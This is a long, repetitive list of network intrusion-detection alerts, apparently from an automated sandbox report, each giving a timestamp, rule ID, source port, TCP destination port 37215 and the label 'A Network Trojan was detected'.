          Timestamp:06/08/24-15:05:25.791844
          SID:2835222
          Source Port:37032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177371
          SID:2829579
          Source Port:55052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781853
          SID:2835222
          Source Port:38766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667620
          SID:2829579
          Source Port:60276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021711
          SID:2829579
          Source Port:52670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516834
          SID:2829579
          Source Port:56340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514531
          SID:2829579
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025804
          SID:2835222
          Source Port:57906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115429
          SID:2829579
          Source Port:48220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016966
          SID:2829579
          Source Port:58372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044777
          SID:2829579
          Source Port:36076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730119
          SID:2829579
          Source Port:52926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601609
          SID:2829579
          Source Port:58628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025899
          SID:2829579
          Source Port:58706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599329
          SID:2829579
          Source Port:34384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236647
          SID:2835222
          Source Port:56204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747861
          SID:2835222
          Source Port:41768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734446
          SID:2829579
          Source Port:34940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241201
          SID:2835222
          Source Port:42998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509003
          SID:2835222
          Source Port:33022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800976
          SID:2829579
          Source Port:40694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350708
          SID:2829579
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037168
          SID:2835222
          Source Port:53870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169479
          SID:2829579
          Source Port:55234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239374
          SID:2829579
          Source Port:60048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448801
          SID:2829579
          Source Port:56070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405252
          SID:2835222
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152323
          SID:2829579
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351868
          SID:2835222
          Source Port:47416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893753
          SID:2835222
          Source Port:50280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159910
          SID:2835222
          Source Port:50892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099543
          SID:2835222
          Source Port:59592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602969
          SID:2829579
          Source Port:47310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407393
          SID:2835222
          Source Port:43540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781096
          SID:2835222
          Source Port:46228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378425
          SID:2835222
          Source Port:45788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099179
          SID:2829579
          Source Port:39790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743705
          SID:2829579
          Source Port:39718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162860
          SID:2829579
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468688
          SID:2835222
          Source Port:45726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895944
          SID:2829579
          Source Port:53392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.083067
          SID:2835222
          Source Port:48282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238132
          SID:2835222
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351370
          SID:2835222
          Source Port:56706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470512
          SID:2835222
          Source Port:41560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276460
          SID:2829579
          Source Port:55816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005518
          SID:2835222
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233481
          SID:2835222
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513973
          SID:2835222
          Source Port:35386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912831
          SID:2829579
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136127
          SID:2829579
          Source Port:36288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793002
          SID:2835222
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266483
          SID:2835222
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510363
          SID:2829579
          Source Port:44884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114288
          SID:2829579
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463342
          SID:2835222
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020376
          SID:2835222
          Source Port:58314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178689
          SID:2829579
          Source Port:39172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056317
          SID:2829579
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465880
          SID:2829579
          Source Port:44264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912506
          SID:2829579
          Source Port:51868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894941
          SID:2835222
          Source Port:52552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787564
          SID:2835222
          Source Port:41862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669606
          SID:2829579
          Source Port:45802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512869
          SID:2835222
          Source Port:47608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111033
          SID:2829579
          Source Port:55488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448817
          SID:2835222
          Source Port:51864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897284
          SID:2829579
          Source Port:56222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745788
          SID:2829579
          Source Port:59634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792433
          SID:2835222
          Source Port:36122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075020
          SID:2835222
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099356
          SID:2835222
          Source Port:50722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159232
          SID:2829579
          Source Port:52320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.125892
          SID:2835222
          Source Port:40188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099470
          SID:2829579
          Source Port:40130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401837
          SID:2835222
          Source Port:46350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038198
          SID:2829579
          Source Port:46580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462943
          SID:2829579
          Source Port:55286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160747
          SID:2835222
          Source Port:41926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732475
          SID:2835222
          Source Port:53078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.899223
          SID:2829579
          Source Port:42730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744180
          SID:2829579
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731041
          SID:2829579
          Source Port:47744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797604
          SID:2835222
          Source Port:36450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857946
          SID:2835222
          Source Port:53120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042874
          SID:2829579
          Source Port:43844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021532
          SID:2835222
          Source Port:33698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352017
          SID:2829579
          Source Port:45084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857478
          SID:2829579
          Source Port:53184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858374
          SID:2835222
          Source Port:42386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356022
          SID:2829579
          Source Port:41988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511287
          SID:2829579
          Source Port:56386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114596
          SID:2835222
          Source Port:46616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128065
          SID:2829579
          Source Port:40594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705398
          SID:2835222
          Source Port:48622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739742
          SID:2835222
          Source Port:35242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705182
          SID:2835222
          Source Port:48102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259999
          SID:2829579
          Source Port:45594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355820
          SID:2829579
          Source Port:44820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912427
          SID:2835222
          Source Port:40562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787499
          SID:2835222
          Source Port:37366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449451
          SID:2829579
          Source Port:34596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784005
          SID:2829579
          Source Port:57324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.797745
          SID:2829579
          Source Port:33812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709231
          SID:2829579
          Source Port:55826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410698
          SID:2829579
          Source Port:43962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262554
          SID:2835222
          Source Port:47710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114156
          SID:2829579
          Source Port:43426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111200
          SID:2835222
          Source Port:47088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107952
          SID:2829579
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017563
          SID:2829579
          Source Port:36270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272334
          SID:2829579
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173956
          SID:2835222
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676573
          SID:2835222
          Source Port:58928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599667
          SID:2829579
          Source Port:48130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107788
          SID:2835222
          Source Port:44632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242270
          SID:2835222
          Source Port:48432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813152
          SID:2829579
          Source Port:35490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514604
          SID:2835222
          Source Port:59626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016580
          SID:2835222
          Source Port:44534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706269
          SID:2835222
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087965
          SID:2835222
          Source Port:40386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468709
          SID:2835222
          Source Port:59058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040269
          SID:2835222
          Source Port:48834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404467
          SID:2835222
          Source Port:54548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395092
          SID:2835222
          Source Port:41928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275710
          SID:2835222
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509579
          SID:2829579
          Source Port:56160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549935
          SID:2829579
          Source Port:50274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731572
          SID:2829579
          Source Port:43076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468175
          SID:2829579
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744896
          SID:2835222
          Source Port:36876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353958
          SID:2829579
          Source Port:41108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352941
          SID:2835222
          Source Port:42162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299849
          SID:2835222
          Source Port:56460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126934
          SID:2835222
          Source Port:34670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884513
          SID:2835222
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014821
          SID:2829579
          Source Port:41710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792801
          SID:2835222
          Source Port:52816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406566
          SID:2835222
          Source Port:53894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020851
          SID:2835222
          Source Port:57814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160610
          SID:2829579
          Source Port:32798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732005
          SID:2829579
          Source Port:59624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734966
          SID:2829579
          Source Port:44240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269136
          SID:2835222
          Source Port:40466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242951
          SID:2829579
          Source Port:51346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.125887
          SID:2829579
          Source Port:32834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442167
          SID:2835222
          Source Port:54674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846199
          SID:2835222
          Source Port:38316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888617
          SID:2835222
          Source Port:45826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911969
          SID:2835222
          Source Port:33424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884654
          SID:2835222
          Source Port:54454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495703
          SID:2835222
          Source Port:54530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462436
          SID:2835222
          Source Port:45254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850691
          SID:2829579
          Source Port:52890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601243
          SID:2829579
          Source Port:47172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808195
          SID:2835222
          Source Port:38656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896771
          SID:2835222
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158965
          SID:2835222
          Source Port:33048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170536
          SID:2829579
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178256
          SID:2835222
          Source Port:41840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021065
          SID:2835222
          Source Port:58574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743736
          SID:2829579
          Source Port:59410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709035
          SID:2829579
          Source Port:40286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259699
          SID:2835222
          Source Port:57636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860737
          SID:2829579
          Source Port:33246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862947
          SID:2835222
          Source Port:55520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014524
          SID:2829579
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854764
          SID:2835222
          Source Port:41384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113989
          SID:2829579
          Source Port:46160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894922
          SID:2835222
          Source Port:50874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747718
          SID:2835222
          Source Port:40720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887535
          SID:2829579
          Source Port:39826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161412
          SID:2835222
          Source Port:37346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495775
          SID:2835222
          Source Port:60838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603084
          SID:2835222
          Source Port:38434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708279
          SID:2835222
          Source Port:52614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466771
          SID:2835222
          Source Port:45878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240494
          SID:2835222
          Source Port:34270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670009
          SID:2829579
          Source Port:43388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018224
          SID:2835222
          Source Port:57188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.064409
          SID:2835222
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273405
          SID:2829579
          Source Port:44598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810441
          SID:2835222
          Source Port:52952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747771
          SID:2829579
          Source Port:53648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471239
          SID:2829579
          Source Port:37592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130115
          SID:2835222
          Source Port:34198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855096
          SID:2829579
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515297
          SID:2835222
          Source Port:49616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861890
          SID:2829579
          Source Port:44924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781255
          SID:2829579
          Source Port:36010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465901
          SID:2835222
          Source Port:39586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114585
          SID:2829579
          Source Port:58496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892511
          SID:2829579
          Source Port:59422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351212
          SID:2829579
          Source Port:37974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600366
          SID:2829579
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784189
          SID:2829579
          Source Port:42332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671482
